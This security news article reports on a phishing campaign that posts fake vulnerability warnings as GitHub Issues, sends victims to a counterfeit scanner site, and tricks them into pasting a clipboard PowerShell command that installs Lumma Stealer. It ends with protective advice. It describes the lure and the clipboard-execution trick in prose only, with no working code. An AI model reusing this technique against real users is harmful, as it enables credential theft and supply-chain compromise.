Clever ‘GitHub Scanner’ Campaign Abusing Repositories to Distribute Lumma Stealer Malware

A new and sophisticated phishing campaign is leveraging GitHub repositories to distribute the Lumma Stealer, a password-stealing malware. By exploiting GitHub’s Issues feature, attackers are tricking developers and contributors into visiting a counterfeit website, leading them to install malware on their Windows machines. This campaign is particularly dangerous as it targets users who frequent open source project repositories or are subscribed to email notifications from these projects.

Phishing Technique: Exploiting GitHub ‘Issues’ for Malware Distribution

In this campaign, malicious actors create a new "issue" on an open source repository, falsely claiming that the project contains a security vulnerability. The issue urges users to visit a domain called "github-scanner[.]com" to investigate and resolve the alleged problem. However, this domain is not affiliated with GitHub and is designed to trick users into downloading malware.

What makes this phishing campaign especially convincing is that GitHub automatically sends email notifications when new issues are created. These email alerts, which come from the legitimate GitHub email address ([email protected]), warn users about the "security vulnerability" and instruct them to visit the fake website. The emails are signed as though they come from the "GitHub Security Team," further increasing their credibility.

Bogus Security Alerts and Malicious Redirects

Once users click on the link in the email, they are directed to the fake GitHub Scanner website. Upon arrival, they are presented with a deceptive captcha asking them to "verify you are human." However, behind the scenes, JavaScript code copies malicious code to the user’s clipboard.

The next screen then prompts users to execute the copied code by opening the Windows Run dialog (Win+R) and pasting the clipboard contents. The copied text includes a PowerShell command that downloads a malicious Windows executable from the fake domain, saves it as SysSetup.exe, and executes it.

Technical Breakdown of the Malware

The malware, identified as Lumma Stealer, is a trojan designed to steal sensitive information such as:

• Passwords and credentials stored in web browsers.
• Authentication cookies, which could allow attackers to access online accounts without passwords.
• Browsing history and other sensitive data from installed browsers.
• Cryptocurrency wallets or files containing private keys.

The Lumma Stealer malware also has anti-detection capabilities and can establish persistence on the infected machine, allowing it to remain active even after reboots. It attempts to contact several suspicious domains, although most of these domains were down at the time of writing.

The Danger of GitHub ‘Issues’ Feature Abuse

The success of this campaign hinges on the attackers’ abuse of GitHub’s Issues feature. Threat actors create fake GitHub accounts and submit new issues to open source repositories, falsely claiming that security vulnerabilities exist. This action triggers legitimate email notifications from GitHub’s servers, making the phishing attempt appear authentic. Developers and contributors to these repositories, as well as any users subscribed to receive notifications, are then lured into visiting the fake GitHub Scanner domain.

By exploiting GitHub’s notification system, the attackers increase the reach and effectiveness of their campaign. BleepingComputer reported that similar tactics were used in recent campaigns, where attackers responded to GitHub Issues with fake solutions, again leading victims to malware installations.

Potential Consequences: Supply Chain Attacks and Credential Theft

This campaign is likely part of a broader effort to steal developer credentials and compromise open source projects. By gaining access to developers’ GitHub accounts, attackers could potentially modify the source code of popular projects, inserting malicious code that could affect anyone using those projects. This could result in supply chain attacks, where malicious code is introduced into software used by millions of people or businesses.

Supply chain attacks are particularly concerning in the open source community because many organizations rely on open source libraries and tools in their applications. A compromise at the source code level could have devastating downstream effects, impacting users across the globe.

How Developers and Users Can Protect Themselves

To defend against this phishing campaign and similar attacks, GitHub users are advised to follow these best practices:

1. Avoid Clicking on Suspicious Links: Be wary of links in email notifications, even if they come from legitimate addresses like GitHub’s. Double-check the domain before visiting it.
2. Report Suspicious GitHub Issues: If you encounter a suspicious issue claiming to report a security vulnerability, report it to GitHub for investigation.
3. Verify Security Alerts: Always cross-reference any alleged security vulnerabilities with the project’s official maintainers or security advisories.
4. Implement Strong Security Measures: Use multi-factor authentication (MFA) for your GitHub account to prevent unauthorized access, even if credentials are compromised.
5. Monitor for Malware: Use antivirus and endpoint detection tools to detect malware, such as Lumma Stealer, that may have been inadvertently installed on your system.
6. Stay Updated: Ensure that all development environments, including browsers and operating systems, are regularly updated to mitigate vulnerabilities that malware may exploit.

The Rising Threat of Platform Abuse

The GitHub Scanner campaign demonstrates how even trusted platforms like GitHub can be abused by threat actors to distribute malware. By leveraging GitHub’s Issues feature and sending notifications through legitimate servers, attackers can easily lure developers and contributors into visiting malicious sites. These campaigns are likely aimed at credential theft and supply chain attacks, where the goal is to compromise open source projects and the developers behind them.

Organizations and developers must remain vigilant, taking proactive steps to secure their GitHub accounts and avoid falling victim to such attacks.